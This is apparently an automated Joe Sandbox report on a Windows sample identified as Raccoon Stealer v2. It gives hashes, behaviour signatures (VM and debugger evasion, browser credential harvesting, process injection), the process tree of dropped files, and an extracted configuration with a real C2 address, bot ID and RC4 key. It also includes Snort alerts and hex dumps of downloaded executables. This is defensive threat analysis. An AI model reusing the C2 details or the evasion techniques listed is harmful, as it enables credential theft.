Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KbqArOlW06.exe

Overview

General Information

Sample Name:KbqArOlW06.exe
Analysis ID:679264
MD5:005297e7c0d555822b5a6f31fcdc7661
SHA1:9d5f9d90a1574c333ec68dbc800cb70397a1826d
SHA256:6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
Tags:exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
.NET source code contains potential unpacker
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • KbqArOlW06.exe (PID: 2740 cmdline: "C:\Users\user\Desktop\KbqArOlW06.exe" MD5: 005297E7C0D555822B5A6F31FCDC7661)
    • 2.0.0-beta2.cps.exe (PID: 2332 cmdline: "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe" MD5: 881CBC2DA4C6467AEC519F4909371AF8)
    • A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" MD5: B184AD382E1729FEEA1E7BB94307930F)
      • A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp (PID: 5096 cmdline: "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" MD5: D8467CA1F529C6C6DECB1B82DBAED1DF)
  • cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://51.195.166.178/", "http://51.195.166.178/"], "Bot ID": "517bb0d640c1242c3f069aab3d1018d6", "RC4_key1": "517bb0d640c1242c3f069aab3d1018d6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
    00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
      00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
        00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
          00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.KbqArOlW06.exe.16636690.0.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
              0.3.KbqArOlW06.exe.16726700.2.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                0.3.KbqArOlW06.exe.18de6818.7.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                  0.3.KbqArOlW06.exe.179e67e0.6.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                    0.3.KbqArOlW06.exe.166866c8.1.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                      Click to see the 16 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.451.195.166.17849778802036934 08/05/22-13:54:12.723337
                      SID:2036934
                      Source Port:49778
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:51.195.166.178192.168.2.480497782036955 08/05/22-13:54:12.825297
                      SID:2036955
                      Source Port:80
                      Destination Port:49778
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: KbqArOlW06.exeVirustotal: Detection: 26%Perma Link
                      Source: KbqArOlW06.exeMetadefender: Detection: 28%Perma Link
                      Source: KbqArOlW06.exeReversingLabs: Detection: 69%
                      Antivirus / Scanner detection for submitted sample
                      Source: KbqArOlW06.exeAvira: detected
                      Multi AV Scanner detection for domain / URL
                      Source: http://51.195.166.178/Virustotal: Detection: 7%Perma Link
                      Source: 0.3.KbqArOlW06.exe.18de6818.7.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 0.3.KbqArOlW06.exe.16726700.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.3.KbqArOlW06.exe.16636690.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.3.KbqArOlW06.exe.16866738.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.3.KbqArOlW06.exe.179e67e0.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.3.KbqArOlW06.exe.16ae6770.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.3.KbqArOlW06.exe.166866c8.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Raccoon {"C2 url": ["http://51.195.166.178/", "http://51.195.166.178/"], "Bot ID": "517bb0d640c1242c3f069aab3d1018d6", "RC4_key1": "517bb0d640c1242c3f069aab3d1018d6"}
                      Source: KbqArOlW06.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr
                      Source: Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
                      Source: Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
                      Source: Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
                      Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
                      Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00453238 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose,

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.4:49778 -> 51.195.166.178:80
                      Source: TrafficSnort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 51.195.166.178:80 -> 192.168.2.4:49778
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://51.195.166.178/
                      Source: Malware configuration extractorURLs: http://51.195.166.178/
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:13 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:15 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:17 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:18 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:19 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 